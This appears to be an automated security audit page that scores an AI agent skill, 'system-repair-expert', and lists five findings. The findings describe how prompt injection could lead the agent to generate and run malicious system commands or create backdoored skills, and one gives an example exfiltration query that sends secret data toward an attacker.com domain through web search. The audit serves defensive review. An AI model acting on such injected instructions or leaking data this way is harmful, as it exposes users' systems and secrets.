Trust Assessment
system-repair-expert received a trust score of 55/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 5 findings: 1 critical, 1 high, 2 medium, and 1 low severity. Key findings include "Missing required field: name", "Node lockfile missing", and "Skill generates and potentially executes arbitrary system scripts".
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 48/100, indicating areas for improvement.
Last analyzed on February 14, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (5)
| Severity | Finding | Layer | Location |
|---|---|---|---|
| CRITICAL | Skill generates and potentially executes arbitrary system scripts. The skill explicitly states its capability to "编写一次性修复脚本/命令" (write one-time fix scripts/commands) as a last resort. While it mentions requiring user consent and basic security checks, the core functionality of generating and potentially executing arbitrary system commands based on user input or problem analysis presents a severe command injection vulnerability. An attacker could craft a problem description that leads the AI to generate and execute malicious commands, bypassing safeguards if the AI's internal checks are insufficient or if the execution environment is not properly sandboxed. The skill's purpose is to fix "system, software, configuration" issues, which inherently involves privileged operations. Implement strict sandboxing for script execution, if execution is allowed. All generated scripts must be thoroughly reviewed by a human and executed in an isolated, low-privilege environment. Consider removing the direct execution capability and only providing the script for manual user review and execution. Enhance the "basic security checks" with robust, pre-defined validation rules for commands and arguments. | LLM | SKILL.md:70 |
| HIGH | Skill can create or modify other skills. The skill states it can "调用内置的「创建/编写 Skill」能力" (call the built-in "create/write Skill" capability) if a new reusable skill is needed. This grants the AI agent excessive permissions to modify its own operational logic or create new skills. An attacker could exploit this through prompt injection to manipulate the AI into creating malicious skills, injecting backdoors, or altering existing skills to perform unauthorized actions, exfiltrate data, or execute arbitrary commands. This capability significantly broadens the attack surface. Restrict the AI's ability to create or modify skills. If this functionality is essential, implement a human-in-the-loop approval process for any skill creation or modification. Ensure that the skill creation process is heavily sandboxed and validated, preventing the injection of malicious code or configurations. | LLM | SKILL.md:57 |
| MEDIUM | Missing required field: name. The 'name' field is required for claude_code skills but is missing from frontmatter. Add a 'name' field to the SKILL.md frontmatter. | Static | skills/xqicxx/system-repair-expert/SKILL.md:1 |
| MEDIUM | Potential data exfiltration through web search queries. The skill uses a `web_search` tool (Brave API) with user-provided input (`query` or `problemDescription`). While the `web_search` tool itself is likely sandboxed, a malicious user could craft a problem description or query that attempts to exfiltrate sensitive information (e.g., environment variables, internal system details, or parts of the conversation history) by including it in a search query directed at an attacker-controlled domain (e.g., `web_search("my_secret_data site:attacker.com")`). The `integration.js` directly uses the `query` parameter in the search string. Implement strict input validation and sanitization for all user-provided input before it is used in `web_search` queries. Filter out sensitive keywords, URLs, or patterns that could indicate exfiltration attempts. Consider redacting or masking potentially sensitive information before it reaches the `web_search` tool. The `web_search` tool itself should also have safeguards against such abuse. | LLM | integration.js:20 |
| LOW | Node lockfile missing. package.json is present but no lockfile was found (package-lock.json, pnpm-lock.yaml, or yarn.lock). Commit a lockfile for deterministic dependency resolution. | Dependencies | skills/xqicxx/system-repair-expert/package.json |